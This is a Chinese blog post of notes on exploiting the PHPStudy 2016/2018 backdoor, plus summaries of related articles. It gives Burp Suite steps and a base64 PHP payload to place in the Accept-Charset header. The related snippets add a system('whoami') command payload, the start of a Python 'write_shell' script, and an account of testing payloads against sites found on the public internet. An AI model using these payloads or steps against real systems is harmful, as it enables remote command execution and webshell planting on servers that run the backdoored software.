PHPStudy漏洞利用笔记

最新推荐文章于 2024-07-16 06:42:42 发布
最新推荐文章于 2024-07-16 06:42:42 发布
阅读量859 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30508729/article/details/101778977
版权
本文介绍了PhpStudy的严重安全漏洞,涉及2016和2018版的多个PHP版本。利用难度低,主要涉及C&C和命令执行。通过设置代理和使用Burpsuite抓包工具,结合特定的Accept-Charset字段的BASE64编码漏洞代码,可以成功利用该漏洞。不断练习有助于掌握这一漏洞利用技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

后门名称:Phpstudy后门

威胁等级严重

影响范围:Phpstudy 2016、phpstudy2018

后门类型:C&C、命令执行

利用难度:极易

影响范围

目前已知受影响的phpstudy版本:

·  Phpstudy 2016版php-5.4

·  Phpstudy 2018版php-5.2.17

·  Phpstudy 2018版php-5.4.45

看了几篇文章才利用成功的。

漏洞利用:

step1:打开浏览器,设代理 。打开burpsuite设代理 。

step2:利用burpsuite抓包,

除红框部分,为抓包界面,后面的红框部分是自己填上去的。

Accept-Encoding:gzip,deflateAccept-Charset:这个地方是填写漏洞代码的

采用BASE64编码:cGhwaW5mbygpOw==

总结:其实这个漏洞利用很简单,只有自己不断的练习,才能熟练掌握。

 

 

 

最低0.47元/天 解锁文章
02be55f
关注
漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞
李火火的安全圈
02-09 5924
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。
WackoPicko靶机环境搭建+漏洞笔记
千寻的博客
08-20 2198
文章目录第一部分环境搭建使用window server搭建安装phpstudy2016第一步 下载phpstudy,一路下一步安装第二步 安装好的phpstudy网站搭建第一步 将WackoPicko-master放到根目录下第二步 将website放到根目录下导入数据库第一步 创建数据库wackopicko第二步 将current.sql通过sql语句导入数据库第三步 导入成功后的数据库第四步 访问搭好的环境切换版本更换端口在ubuntu使用dockers环境搭建第二部分 漏洞XSSSQL注入文件上传文件
phpstudy漏洞
qq_17054659的博客
01-11 6557
一直在使用的phpstudy,有以下几个漏洞可能存在着被黑的风险,最好能及时修正。 1.通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 2.若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
phpStudy 发现存在重大的bug
u013926384的博客
06-03 4743
确实是挺好用的,但是有些项目里面 某些办法会错乱, 会出问题, 我已经排除不是项目代码问题了, 我下载了个国内开源系统TPshop 安装后, 发现后台有些地方用不了, 比如发布商品的 编辑器报错等, 但是在其他php 环境里面 不会这样问题, 于是摸索了很久, 用phpstudy 切换了好几个版本, 终于可以正常, 事实表明 phpstudy 多个版本切换, 有些版本是有问题的.有些是正常的
php漏洞挖掘与修复,记一次PHPstudy漏洞挖掘过程
weixin_32809369的博客
03-10 212
今天有点烦躁,所以得找点事刺激一下于是,公网上搜了一个PHPstudy的站测试payload看看有没有漏洞,果然、存在漏洞看一下目录GET /phpinfo.php HTTP/1.1 Host: xx.xx.xx.xx User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:40.0) Gecko/20100101 Firefox/...
漏洞复现】phpstudy隐藏后门漏洞的验证与利用
kkza的博客
09-18 1659
1 背景 phpstudy是国内第一款php后端开发调试集成软件,其将php、apache、mysql、phpmyadmin等集成在一起一次性安装,使用者无需在配置上面花太多时间。 2019年杭州警方在净网2019行动后发布了phpstudy存在隐藏后门的漏洞 2影响版本 phpstudy2016 --php/php-5.2.17/ext/php_xmlrpc.dll --php/php-5.4.45/ext/php_xmlrpc.dll phpstudy2018 --PHPTutoria.
漏洞复现】Phpstudy默认Nginx解析漏洞
weixin_43486390的博客
09-04 1032
学习目标: 提示:这里可以添加学习目标 例如:一周掌握 Java 入门知识 学习内容: 提示:这里可以添加要学的内容 例如: 1、 搭建 Java 开发环境 2、 掌握 Java 基本语法 3、 掌握条件语句 4、 掌握循环语句 学习时间: 提示:这里可以添加计划学习的时间 例如: 1、 周一至周五晚上 7 点—晚上9点 2、 周六上午 9 点-上午 11 点 3、 周日下午 3 点-下午 6 点 学习产出: 提示:这里统计学习计划的总量 例如: 1、 技术笔记 2 遍 2、CSDN 技术博客 3 篇
discuz!ML 3.x代码执行漏洞利用 笔记
边城浪子的博客
09-18 1460
服务器:windows 2003 攻击机:windows 10 搭建过程:下载discuz!ML 3.x源码 链接:https://pan.baidu.com/s/1QFd8rdXn_Je6lOehSLTIWw 提取码:5ka0 step1:在windows 2003中安装phpstudy step2:将源码中upload中的文件上传至phpstudy的www目录中。 step3:打...
PhpStudy后门漏洞
chaojixiaojingang
09-08 5050
1.影响版本 phpstudy 2016版php-5.2.17 phpstudy 2016版php-5.4.45 phpstudy 2018版php-5.2.17 phpstudy 2018版php-5.4.45 2.后门检测分析 1)通过分析,后门代码存在于\ext\php_xmlrpc.dll模块中 (1)phpStudy2016路径: php\php-5.2.17\ext\php_xmlrpc.dll php\php-5.4.45\ext\php_xmlrpc.dll (2)phpStudy20
phpstudy_小皮Web面板_RCE漏洞
Ryan的博客
02-08 707
最近爆出phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1729
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
phpstudy mysql 漏洞_phpstudy后门漏洞复现
weixin_39606137的博客
02-28 89
import base64import requestsimport threadpooldef write_shell(url):payload = "echo \"littlebin404\";"payload = base64.b64encode(payload.encode('utf-8'))payload = str(payload, 'utf-8')headers = {'Upgrad...
phpstudy php_xmlrpc.dll后门漏洞复现
https://www.cnblogs.com/zpchcbd/
09-26 7270
搭建环境: phpstudy2018 php版本5.4 漏洞影响版本:5.2/5.4 漏洞利用 1、随便访问一个存在的php文件 我这里就访问index.php好了 2、进行index.php 进行抓包 再自行添加两个字段payload 执行系统命令 Accept-Charset: ZWNobyBzeXN0ZW0oJ3dob2FtaScpOw== Accept-Encoding: gzip,def...
phpstudy小皮Windows面板RCE漏洞
今天是几号的博客
04-01 892
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。
phpstudy 小皮web面板 RCE漏洞
Websec
02-23 1671
这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。紧接着该系统的后台有一个计划任务功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。可以看到确实触发弹窗了,这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了。只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件。访问系统登录面板,页面显示如下。
PHPStudy漏洞:我们该如何看待?
最新发布
ab524100的博客
07-16 460
在互联网的世界里,PHPStudy作为一款集PHP环境、开发工具、教程于一体的集成开发环境(IDE),受到了许多初学者的喜爱。由此可见,随着其使用的广泛,一些安全问题也逐渐浮出水面,那就是我们常说的“PHPStudy漏洞”。说到PHPStudy漏洞,可能很多人会有些紧张,毕竟它涉及到我们的网站安全和数据安全。这并不是说PHPStudy本身不好,而是说我们在使用它的时候,需要保持警惕,了解可能存在的风险。二是定期更新和修补。我们应该多了解一些关于PHPStudy漏洞的知识,了解可能存在的风险和危害。
https phpstudy_phpStudy 隐藏后门 [漏洞插件编写]
weixin_39602280的博客
11-29 156
0x00 漏洞描述 PhpStudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin、ZendOptimizer多款软件一次性安装,无需配置即可直接安装使用,具有PHP环境调试和PHP开发功能,在国内有着近百万PHP语言学习者、开发者用户。 近日,使用广泛的PHPStudy环境集成程序包被公告疑似遭遇黑客攻击,程序包自带PH...
phpStudy_2016-2018_RCE漏洞复现
weixin_44801963的博客
09-24 1686
文章目录前言一、phpStudy_2016-2018_RCE是什么二、漏洞存在的文件位置三、漏洞分析总结 前言 phpstudy漏洞在当时的影响还是蛮大的,所以决定对phpstudy存在的漏洞进行解析复现。 一、phpStudy_2016-2018_RCE是什么 Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。 其中2016、2018版本的phpstudy存在被黑客恶
20万字渗透测试全攻略:网络安全与系统入侵技巧
通过对收集信息、Web服务突破、Web应用漏洞利用、数据库攻击、安全工具使用、安全日志分析、未授权访问、针对流行服务的攻击以及防御机制绕过等方面的深入学习和实践,可以极大地提高网络安全防护能力,有效地进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值